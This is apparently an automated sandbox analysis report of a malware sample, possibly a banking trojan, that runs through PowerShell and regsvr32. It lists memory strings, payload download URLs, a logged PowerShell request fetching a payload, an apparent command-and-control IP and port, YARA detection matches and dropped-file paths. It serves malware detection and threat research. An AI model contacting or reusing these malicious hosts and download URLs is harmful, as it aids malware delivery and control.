                  Source: powershell.exe, 00000002.00000002.320009117.0000000004E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                  Source: powershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com
                  Source: powershell.exe, 00000002.00000002.320849477.00000000051F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com/
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
                  Source: powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com4
                  Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                  Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/P
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/l
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/temV
                  Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                  Source: svchost.exe, 00000008.00000002.504401163.000001EB54229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                  Source: svchost.exe, 00000008.00000002.504401163.000001EB54229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                  Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                  Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                  Source: svchost.exe, 0000000A.00000002.319452146.000001C28006A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317899105.000001C280068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                  Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                  Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                  Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                  Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                  Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                  Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                  Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                  Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000003.299865395.00000000058F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nakharinitwebhosting.com/HSDYKN1X5GLF/
                  Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                  Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                  Source: svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318500901.000001C280045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                  Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318593022.000001C28003A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                  Source: svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                  Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                  Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                  Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                  Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                  Source: svchost.exe, 00000016.00000003.412280147.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.412123410.0000019AC659A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                  Source: unknownDNS traffic detected: queries for: www.jsonsintl.com
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006B24 InternetReadFile,17_2_0000000180006B24
                  Source: global trafficHTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 16.2.regsvr32.exe.28c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.regsvr32.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.regsvr32.exe.c60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.regsvr32.exe.28c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Source: Process Memory Space: powershell.exe PID: 6408, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                  Source: Process Memory Space: powershell.exe PID: 6408, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\AHWppkeB\Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF12B016_2_00007FFC65CF12B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF4A7016_2_00007FFC65CF4A70
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF5E0116_2_00007FFC65CF5E01
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF5CAD16_2_00007FFC65CF5CAD
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF685016_2_00007FFC65CF6850
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF443C16_2_00007FFC65CF443C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF53FB16_2_00007FFC65CF53FB
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_010E000016_2_010E0000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000641416_2_0000000180006414
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180005C7416_2_0000000180005C74
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002ACE816_2_000000018002ACE8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002410416_2_0000000180024104
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002011816_2_0000000180020118
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000359C16_2_000000018000359C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000E99C16_2_000000018000E99C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001962816_2_0000000180019628
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180025A4C16_2_0000000180025A4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002B7B216_2_000000018002B7B2
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000940816_2_0000000180009408
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180023C1416_2_0000000180023C14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002582C16_2_000000018002582C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000B83416_2_000000018000B834
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000403C16_2_000000018000403C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002144416_2_0000000180021444
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001204416_2_0000000180012044
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001605416_2_0000000180016054
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001705C16_2_000000018001705C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000187016_2_0000000180001870
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001F87816_2_000000018001F878
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001448416_2_0000000180014484
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001549416_2_0000000180015494
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000BC9816_2_000000018000BC98
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180008C9C16_2_0000000180008C9C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800078A416_2_00000001800078A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001F0A816_2_000000018001F0A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001E4AC16_2_000000018001E4AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800048B016_2_00000001800048B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001ACB416_2_000000018001ACB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800090B416_2_00000001800090B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800270C016_2_00000001800270C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800024C016_2_00000001800024C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800280C816_2_00000001800280C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800050D416_2_00000001800050D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800234D816_2_00000001800234D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800150F016_2_00000001800150F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001250016_2_0000000180012500
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001A10C16_2_000000018001A10C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180028D1016_2_0000000180028D10
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001A52416_2_000000018001A524
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180002D2816_2_0000000180002D28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000E13016_2_000000018000E130
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002913416_2_0000000180029134
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000813416_2_0000000180008134
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002214016_2_0000000180022140
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000695416_2_0000000180006954
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000F55416_2_000000018000F554
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002B56416_2_000000018002B564
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001216816_2_0000000180012168
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001356816_2_0000000180013568
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002457016_2_0000000180024570
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001917816_2_0000000180019178
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002518016_2_0000000180025180
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000198016_2_0000000180001980
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002158816_2_0000000180021588
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001A98816_2_000000018001A988
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001819016_2_0000000180018190
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001399416_2_0000000180013994
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002899816_2_0000000180028998
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800061A016_2_00000001800061A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800135A616_2_00000001800135A6
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180016DA816_2_0000000180016DA8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800059AC16_2_00000001800059AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800135B416_2_00000001800135B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001C1B816_2_000000018001C1B8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800025B816_2_00000001800025B8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800085BC16_2_00000001800085BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800015C016_2_00000001800015C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800295C816_2_00000001800295C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800229CC16_2_00000001800229CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000E5D416_2_000000018000E5D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002A5D816_2_000000018002A5D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800261E016_2_00000001800261E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800079EC16_2_00000001800079EC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002362416_2_0000000180023624
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001862816_2_0000000180018628
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180017E2C16_2_0000000180017E2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001763816_2_0000000180017638
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180004E3C16_2_0000000180004E3C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180020E4016_2_0000000180020E40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180015A6416_2_0000000180015A64
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001526416_2_0000000180015264
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000A26C16_2_000000018000A26C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000767816_2_0000000180007678
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001667C16_2_000000018001667C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001268016_2_0000000180012680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180001E8816_2_0000000180001E88
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000968C16_2_000000018000968C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002229016_2_0000000180022290
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180026A9016_2_0000000180026A90
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000529C16_2_000000018000529C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180020AA016_2_0000000180020AA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180022AAC16_2_0000000180022AAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180007EB416_2_0000000180007EB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800162BC16_2_00000001800162BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800252C016_2_00000001800252C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001AEC816_2_000000018001AEC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001F6DC16_2_000000018001F6DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800026DC16_2_00000001800026DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180002ADC16_2_0000000180002ADC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001E2F416_2_000000018001E2F4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180016AF416_2_0000000180016AF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000DEF416_2_000000018000DEF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001DEFC16_2_000000018001DEFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000630816_2_0000000180006308
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001370C16_2_000000018001370C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180004B1816_2_0000000180004B18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180015F2416_2_0000000180015F24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180006B2416_2_0000000180006B24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000F32816_2_000000018000F328
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002173816_2_0000000180021738
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002AF3816_2_000000018002AF38
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002834816_2_0000000180028348
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000DB4C16_2_000000018000DB4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180014F5016_2_0000000180014F50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000B35016_2_000000018000B350
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000A75816_2_000000018000A758
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002975C16_2_000000018002975C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018002437016_2_0000000180024370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000837016_2_0000000180008370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001577416_2_0000000180015774
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001237816_2_0000000180012378
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180026B9816_2_0000000180026B98
